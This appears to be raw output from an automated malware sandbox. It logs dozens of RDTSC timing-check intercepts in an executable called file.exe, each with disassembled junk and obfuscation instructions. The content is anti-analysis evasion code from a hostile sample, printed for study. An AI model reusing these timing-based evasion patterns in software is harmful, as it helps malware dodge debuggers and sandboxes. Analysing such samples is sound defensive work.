Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0B49 second address: 6EA0BD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B236Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pushfd 0x0000000f jmp 00007F45B11B2372h 0x00000014 xor eax, 32771EA8h 0x0000001a jmp 00007F45B11B236Bh 0x0000001f popfd 0x00000020 pop ecx 0x00000021 pushfd 0x00000022 jmp 00007F45B11B2379h 0x00000027 sub ecx, 26D0E2C6h 0x0000002d jmp 00007F45B11B2371h 0x00000032 popfd 0x00000033 popad 0x00000034 nop 0x00000035 jmp 00007F45B11B236Eh 0x0000003a lea eax, dword ptr [ebp-08h] 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F45B11B236Ah 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0BD6 second address: 6EA0BE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0BE5 second address: 6EA0C12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2379h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F45B11B236Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0C12 second address: 6EA0C18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0C18 second address: 6EA0C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0C76 second address: 6EA0C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45B187B8DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0C88 second address: 6EA0C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0C8C second address: 6EA0CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F4620C1A2FBh 0x0000000e pushad 0x0000000f mov edi, 4A0AA090h 0x00000014 mov esi, ebx 0x00000016 popad 0x00000017 mov eax, dword ptr [ebp-04h] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d movsx edi, si 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0CAC second address: 6EA0CBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+08h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0CBE second address: 6EA0CE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F45B187B8DDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0CE9 second address: 6EA0CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45B11B236Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0CF9 second address: 6EA0D2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a jmp 00007F45B187B8E7h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F45B187B8E0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0D2F second address: 6EA0D3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B236Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0D3E second address: 6EA0D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0D44 second address: 6EA0D48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0D48 second address: 6EA0D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F45B187B8DDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0D60 second address: 6EA0D96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F45B11B2377h 0x00000008 mov ecx, 048608EFh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F45B11B2371h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0D96 second address: 6EA0E25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 66E2h 0x00000007 mov esi, ebx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lea eax, dword ptr [ebp-18h] 0x0000000f pushad 0x00000010 mov eax, ebx 0x00000012 pushfd 0x00000013 jmp 00007F45B187B8E7h 0x00000018 jmp 00007F45B187B8E3h 0x0000001d popfd 0x0000001e popad 0x0000001f nop 0x00000020 jmp 00007F45B187B8E6h 0x00000025 push eax 0x00000026 jmp 00007F45B187B8DBh 0x0000002b nop 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F45B187B8E4h 0x00000033 add ecx, 30E75968h 0x00000039 jmp 00007F45B187B8DBh 0x0000003e popfd 0x0000003f push eax 0x00000040 push edx 0x00000041 mov bl, ah 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0E89 second address: 6EA0F4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45B11B2371h 0x00000009 and ax, 04F6h 0x0000000e jmp 00007F45B11B2371h 0x00000013 popfd 0x00000014 call 00007F45B11B2370h 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d test edi, edi 0x0000001f jmp 00007F45B11B2371h 0x00000024 js 00007F4620550B39h 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F45B11B236Ch 0x00000031 add eax, 7ADB2078h 0x00000037 jmp 00007F45B11B236Bh 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007F45B11B2378h 0x00000043 jmp 00007F45B11B2375h 0x00000048 popfd 0x00000049 popad 0x0000004a mov eax, dword ptr [ebp-14h] 0x0000004d pushad 0x0000004e mov di, cx 0x00000051 mov ch, 78h 0x00000053 popad 0x00000054 mov ecx, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F45B11B236Eh 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0F4E second address: 6EA0F54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0F54 second address: 6EA0F65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA0F65 second address: 6EA0F9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F45B187B8E3h 0x00000008 mov ax, 3C3Fh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov edx, 762C06ECh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F45B187B8E1h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA1074 second address: 6EA107A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA107A second address: 6EA108A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA108A second address: 6EA10A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2374h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA10A2 second address: 6EA10CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F45B187B8E5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA10CA second address: 6EA10D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA10D0 second address: 6EA10D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA10D4 second address: 6EA10F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F45B11B2372h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA10F3 second address: 6EA110D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA110D second address: 6EA1149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, al 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+08h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov eax, 1C3517CFh 0x00000015 pushfd 0x00000016 jmp 00007F45B11B2374h 0x0000001b or cx, 4678h 0x00000020 jmp 00007F45B11B236Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA1149 second address: 6EA116F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA116F second address: 6EA1173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA1173 second address: 6EA1179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA1179 second address: 6EA11AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 jmp 00007F45B11B236Dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esi+0Ch] 0x00000011 jmp 00007F45B11B236Eh 0x00000016 mov dword ptr [edx+0Ch], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ebx, 22758680h 0x00000021 mov ecx, edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA11AE second address: 6EA11B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA11B4 second address: 6EA11E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B236Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+10h] 0x0000000e jmp 00007F45B11B2370h 0x00000013 mov dword ptr [edx+10h], eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA11E2 second address: 6EA1256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F45B187B8E6h 0x0000000b sub cl, 00000058h 0x0000000e jmp 00007F45B187B8DBh 0x00000013 popfd 0x00000014 popad 0x00000015 mov eax, dword ptr [esi+14h] 0x00000018 jmp 00007F45B187B8E6h 0x0000001d mov dword ptr [edx+14h], eax 0x00000020 jmp 00007F45B187B8E0h 0x00000025 mov eax, dword ptr [esi+18h] 0x00000028 jmp 00007F45B187B8E0h 0x0000002d mov dword ptr [edx+18h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA1256 second address: 6EA125C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA125C second address: 6EA1305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F45B187B8E2h 0x00000008 pushfd 0x00000009 jmp 00007F45B187B8E2h 0x0000000e or ax, 10A8h 0x00000013 jmp 00007F45B187B8DBh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [esi+1Ch] 0x0000001f pushad 0x00000020 call 00007F45B187B8E4h 0x00000025 push ecx 0x00000026 pop ebx 0x00000027 pop eax 0x00000028 pushfd 0x00000029 jmp 00007F45B187B8E7h 0x0000002e sub ecx, 0037534Eh 0x00000034 jmp 00007F45B187B8E9h 0x00000039 popfd 0x0000003a popad 0x0000003b mov dword ptr [edx+1Ch], eax 0x0000003e jmp 00007F45B187B8DEh 0x00000043 mov eax, dword ptr [esi+20h] 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA1305 second address: 6EA130D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, cx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA130D second address: 6EA1313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA1313 second address: 6EA1317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA1317 second address: 6EA136B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+20h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dx, 2F96h 0x00000015 pushfd 0x00000016 jmp 00007F45B187B8E7h 0x0000001b jmp 00007F45B187B8E3h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA136B second address: 6EA13B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45B11B236Fh 0x00000009 sbb al, 0000007Eh 0x0000000c jmp 00007F45B11B2379h 0x00000011 popfd 0x00000012 jmp 00007F45B11B2370h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi+24h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA13B6 second address: 6EA13CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F45B187B8E3h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA13CF second address: 6EA13D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA13D5 second address: 6EA13D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA13D9 second address: 6EA1438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b jmp 00007F45B11B236Ch 0x00000010 mov eax, dword ptr [esi+28h] 0x00000013 jmp 00007F45B11B2370h 0x00000018 mov dword ptr [edx+28h], eax 0x0000001b pushad 0x0000001c mov bx, 0F50h 0x00000020 popad 0x00000021 mov ecx, dword ptr [esi+2Ch] 0x00000024 jmp 00007F45B11B236Fh 0x00000029 mov dword ptr [edx+2Ch], ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F45B11B2375h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA1438 second address: 6EA143E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA143E second address: 6EA147E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2373h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [esi+30h] 0x0000000f jmp 00007F45B11B2376h 0x00000014 mov word ptr [edx+30h], ax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ch, dl 0x0000001d movzx ecx, dx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA147E second address: 6EA14C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F45B187B8DDh 0x00000016 adc eax, 72854EA6h 0x0000001c jmp 00007F45B187B8E1h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA14C0 second address: 6EA14DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B236Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA14DB second address: 6EA14DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA14DF second address: 6EA14E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA14E5 second address: 6EA155D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c jmp 00007F45B187B8E0h 0x00000011 mov dword ptr [edx+34h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F45B187B8DDh 0x0000001d adc si, 3AC6h 0x00000022 jmp 00007F45B187B8E1h 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F45B187B8E0h 0x0000002e add esi, 01FE4B68h 0x00000034 jmp 00007F45B187B8DBh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA155D second address: 6EA15AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, 5E98h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test ecx, 00000700h 0x00000012 jmp 00007F45B11B2377h 0x00000017 jne 00007F46205504F7h 0x0000001d jmp 00007F45B11B2376h 0x00000022 or dword ptr [edx+38h], FFFFFFFFh 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA15AC second address: 6EA15B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA15B0 second address: 6EA15CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2379h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EA15CD second address: 6EA1622 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F45B187B8DCh 0x00000014 add ecx, 2C07B4E8h 0x0000001a jmp 00007F45B187B8DBh 0x0000001f popfd 0x00000020 mov ax, 74DFh 0x00000024 popad 0x00000025 or dword ptr [edx+40h], FFFFFFFFh 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F45B187B8E1h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED04A8 second address: 6ED04AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED04AC second address: 6ED04B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED04B2 second address: 6ED04CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45B11B2379h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED04CF second address: 6ED050C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b movsx ebx, ax 0x0000000e jmp 00007F45B187B8E4h 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F45B187B8E7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E90AAA second address: 6E90AAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E90AAF second address: 6E90B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F45B187B8E7h 0x0000000a xor ax, EFDEh 0x0000000f jmp 00007F45B187B8E9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a mov dl, cl 0x0000001c mov bx, B8ECh 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 mov ecx, edx 0x00000026 pushad 0x00000027 mov ax, dx 0x0000002a mov eax, ebx 0x0000002c popad 0x0000002d popad 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F45B187B8DAh 0x00000038 sbb ecx, 0265C238h 0x0000003e jmp 00007F45B187B8DBh 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E5070C second address: 6E50738 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2370h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F45B11B236Dh 0x00000013 pop eax 0x00000014 mov dx, FEB4h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E50B44 second address: 6E50B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E50B4A second address: 6E50B92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 331Fh 0x00000007 pushfd 0x00000008 jmp 00007F45B11B2374h 0x0000000d adc si, EC88h 0x00000012 jmp 00007F45B11B236Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F45B11B2375h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E50B92 second address: 6E50BA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45B187B8DCh 0x00000009 rdtsc
